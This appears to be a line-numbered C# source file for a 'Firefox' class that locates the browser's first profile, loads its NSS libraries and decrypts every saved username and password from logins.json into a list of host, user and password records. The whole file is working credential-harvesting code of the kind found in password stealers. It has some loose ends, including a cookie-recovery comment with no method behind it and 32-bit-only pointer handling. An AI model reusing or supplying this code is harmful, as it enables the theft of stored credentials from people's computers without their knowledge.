using Microsoft.Win32;using System;using System.Collections.Generic;using

1. using Microsoft.Win32;
2. using System;
3. using System.Collections.Generic;
4. using System.ComponentModel;
5. using System.IO;
6. using System.Runtime.InteropServices;
7. using System.Text;
8. /// <summary>
9. /// A small class to recover Firefox Data
10. /// </summary>
11. public static class Firefox
12. {
13. private static IntPtr nssModule;
14.  
15. private static DirectoryInfo firefoxPath;
16. private static DirectoryInfo firefoxProfilePath;
17.  
18. private static FileInfo firefoxLoginFile;
19. private static FileInfo firefoxCookieFile;
20.  
21. static Firefox()
22. {
23.  
24. firefoxPath = GetFirefoxInstallPath();
25. if (firefoxPath == null)
26. throw new NullReferenceException("Firefox is not installed, or the install path could not be located");
27.  
28. firefoxProfilePath = GetProfilePath();
29. if (firefoxProfilePath == null)
30. throw new NullReferenceException("Firefox does not have any profiles, has it ever been launched?");
31.  
32. firefoxLoginFile = GetFile(firefoxProfilePath, "logins.json");
33. if (firefoxLoginFile == null)
34. throw new NullReferenceException("Firefox does not have any logins.json file");
35.  
36. firefoxCookieFile = GetFile(firefoxProfilePath, "cookies.sqlite");
37. if (firefoxCookieFile == null)
38. throw new NullReferenceException("Firefox does not have any cookie file");
39.  
40. }
41.  
42. #region Public Members
43. /// <summary>
44. /// Recover Firefox Passwords from logins.json
45. /// </summary>
46. /// <returns>List of Username/Password/Host</returns>
47. public static List<FirefoxPassword> Passwords()
48. {
49.  
50. List<FirefoxPassword> firefoxPasswords = new List<FirefoxPassword>();
51.  
52. // init libs
53. InitializeDelegates(firefoxProfilePath, firefoxPath);
54.  
55.  
56. JsonFFData ffLoginData = new JsonFFData();
57.  
58. using (StreamReader sr = new StreamReader(firefoxLoginFile.FullName))
59. {
60. string json = sr.ReadToEnd();
61. ffLoginData = JsonConvert.DeserializeObject<JsonFFData>(json);
62. }
63.  
64. foreach (LoginData data in ffLoginData.logins)
65. {
66. string username = Decrypt(data.encryptedUsername);
67. string password = Decrypt(data.encryptedPassword);
68. Uri host = new Uri(data.formSubmitURL);
69.  
70. firefoxPasswords.Add(new FirefoxPassword() { Host = host, Username = username, Password = password });
71. }
72.  
73. return firefoxPasswords;
74. }
75. /// <summary>
76. /// Recover Firefox Cookies from the SQLite3 Database
77. /// </summary>
78. /// <returns>List of Cookies found</returns>
79. #endregion
80.  
81. #region Functions
82. private static void InitializeDelegates(DirectoryInfo firefoxProfilePath, DirectoryInfo firefoxPath)
83. {
84. //LoadLibrary(firefoxPath.FullName + "\\msvcr100.dll");
85. //LoadLibrary(firefoxPath.FullName + "\\msvcp100.dll");
86. LoadLibrary(firefoxPath.FullName + "\\msvcp120.dll");
87. LoadLibrary(firefoxPath.FullName + "\\msvcr120.dll");
88. LoadLibrary(firefoxPath.FullName + "\\mozglue.dll");
89. nssModule = LoadLibrary(firefoxPath.FullName + "\\nss3.dll");
90. IntPtr pProc = GetProcAddress(nssModule, "NSS_Init");
91. NSS_InitPtr NSS_Init = (NSS_InitPtr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(NSS_InitPtr));
92. NSS_Init(firefoxProfilePath.FullName);
93. long keySlot = PK11_GetInternalKeySlot();
94. PK11_Authenticate(keySlot, true, 0);
95. }
96. private static DateTime FromUnixTime(long unixTime)
97. {
98. DateTime epoch = new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc);
99. return epoch.AddSeconds(unixTime);
100. }
101. private static long ToUnixTime(DateTime value)
102. {
103. TimeSpan span = (value - new DateTime(1970, 1, 1, 0, 0, 0, 0).ToLocalTime());
104. return (long)span.TotalSeconds;
105. }
106. #endregion
107.  
108. #region File Handling
109. private static DirectoryInfo GetProfilePath()
110. {
111. string raw = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Mozilla\Firefox\Profiles";
112. if (!Directory.Exists(raw))
113. throw new Exception("Firefox Application Data folder does not exist!");
114. DirectoryInfo profileDir = new DirectoryInfo(raw);
115.  
116. DirectoryInfo[] profiles = profileDir.GetDirectories();
117. if (profiles.Length == 0)
118. throw new IndexOutOfRangeException("No Firefox profiles could be found");
119.  
120. // return first profile, fuck it.
121. return profiles[0];
122.  
123. }
124. private static FileInfo GetFile(DirectoryInfo profilePath, string searchTerm)
125. {
126. foreach (FileInfo file in profilePath.GetFiles(searchTerm))
127. {
128. return file;
129. }
130. throw new Exception("No Firefox logins.json was found");
131.  
132.  
133. }
134. private static DirectoryInfo GetFirefoxInstallPath()
135. {
136. string raw = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + @"\Mozilla Firefox";
137. if (!Directory.Exists(raw))
138. throw new Exception("Firefox not installed!");
139. DirectoryInfo firefoxPath = new DirectoryInfo(raw);
140.  
141. return firefoxPath;
142. }
143. #endregion
144.  
145. #region WinApi
146. // Credit: http://www.pinvoke.net/default.aspx/kernel32.loadlibrary
147. private static IntPtr LoadWin32Library(string libPath)
148. {
149. if (String.IsNullOrEmpty(libPath))
150. throw new ArgumentNullException("libPath");
151.  
152. IntPtr moduleHandle = LoadLibrary(libPath);
153. if (moduleHandle == IntPtr.Zero)
154. {
155. var lasterror = Marshal.GetLastWin32Error();
156. var innerEx = new Win32Exception(lasterror);
157. innerEx.Data.Add("LastWin32Error", lasterror);
158.  
159. throw new Exception("can't load DLL " + libPath, innerEx);
160. }
161. return moduleHandle;
162. }
163.  
164. [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
165. static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);
166.  
167. [DllImport("kernel32.dll")]
168. public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);
169.  
170. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
171. private delegate long NSS_InitPtr(string configdir);
172.  
173. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
174. private delegate int PK11SDR_DecryptPtr(ref TSECItem data, ref TSECItem result, int cx);
175.  
176. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
177. private delegate long PK11_GetInternalKeySlotPtr();
178.  
179. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
180. private delegate long PK11_AuthenticatePtr(long slot, bool loadCerts, long wincx);
181.  
182. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
183. private delegate int NSSBase64_DecodeBufferPtr(IntPtr arenaOpt, IntPtr outItemOpt, StringBuilder inStr, int inLen);
184.  
185. [StructLayout(LayoutKind.Sequential)]
186. private struct TSECItem
187. {
188. public int SECItemType;
189. public int SECItemData;
190. public int SECItemLen;
191. }
192.  
193. #endregion
194.  
195. #region JSON
196. // json deserialize classes
197. private class JsonFFData
198. {
199.  
200. public long nextId;
201. public LoginData[] logins;
202. public string[] disabledHosts;
203. public int version;
204.  
205. }
206. private class LoginData
207. {
208.  
209. public long id;
210. public string hostname;
211. public string url;
212. public string httprealm;
213. public string formSubmitURL;
214. public string usernameField;
215. public string passwordField;
216. public string encryptedUsername;
217. public string encryptedPassword;
218. public string guid;
219. public int encType;
220. public long timeCreated;
221. public long timeLastUsed;
222. public long timePasswordChanged;
223. public long timesUsed;
224.  
225. }
226. #endregion
227.  
228. #region Delegate Handling
229. // Credit: http://www.codeforge.com/article/249225
230. private static long PK11_GetInternalKeySlot()
231. {
232. IntPtr pProc = GetProcAddress(nssModule, "PK11_GetInternalKeySlot");
233. PK11_GetInternalKeySlotPtr ptr = (PK11_GetInternalKeySlotPtr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(PK11_GetInternalKeySlotPtr));
234. return ptr();
235. }
236. private static long PK11_Authenticate(long slot, bool loadCerts, long wincx)
237. {
238. IntPtr pProc = GetProcAddress(nssModule, "PK11_Authenticate");
239. PK11_AuthenticatePtr ptr = (PK11_AuthenticatePtr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(PK11_AuthenticatePtr));
240. return ptr(slot, loadCerts, wincx);
241. }
242. private static int NSSBase64_DecodeBuffer(IntPtr arenaOpt, IntPtr outItemOpt, StringBuilder inStr, int inLen)
243. {
244. IntPtr pProc = GetProcAddress(nssModule, "NSSBase64_DecodeBuffer");
245. NSSBase64_DecodeBufferPtr ptr = (NSSBase64_DecodeBufferPtr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(NSSBase64_DecodeBufferPtr));
246. return ptr(arenaOpt, outItemOpt, inStr, inLen);
247. }
248. private static int PK11SDR_Decrypt(ref TSECItem data, ref TSECItem result, int cx)
249. {
250. IntPtr pProc = GetProcAddress(nssModule, "PK11SDR_Decrypt");
251. PK11SDR_DecryptPtr ptr = (PK11SDR_DecryptPtr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(PK11SDR_DecryptPtr));
252. return ptr(ref data, ref result, cx);
253. }
254. private static string Decrypt(string cypherText)
255. {
256. StringBuilder sb = new StringBuilder(cypherText);
257. int hi2 = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, sb, sb.Length);
258. TSECItem tSecDec = new TSECItem();
259. TSECItem item = (TSECItem)Marshal.PtrToStructure(new IntPtr(hi2), typeof(TSECItem));
260. if (PK11SDR_Decrypt(ref item, ref tSecDec, 0) == 0)
261. {
262. if (tSecDec.SECItemLen != 0)
263. {
264. byte[] bvRet = new byte[tSecDec.SECItemLen];
265. Marshal.Copy(new IntPtr(tSecDec.SECItemData), bvRet, 0, tSecDec.SECItemLen);
266. return Encoding.UTF8.GetString(bvRet);
267. }
268. }
269. return null;
270. }
271. #endregion
272. }
273. public class FirefoxPassword
274. {
275. public string Username { get; set; }
276. public string Password { get; set; }
277. public Uri Host { get; set; }
278. public override string ToString()
279. {
280. return string.Format("User: {0}{3}Pass: {1}{3}Host: {2}", Username, Password, Host.Host, Environment.NewLine);
281. }
282. }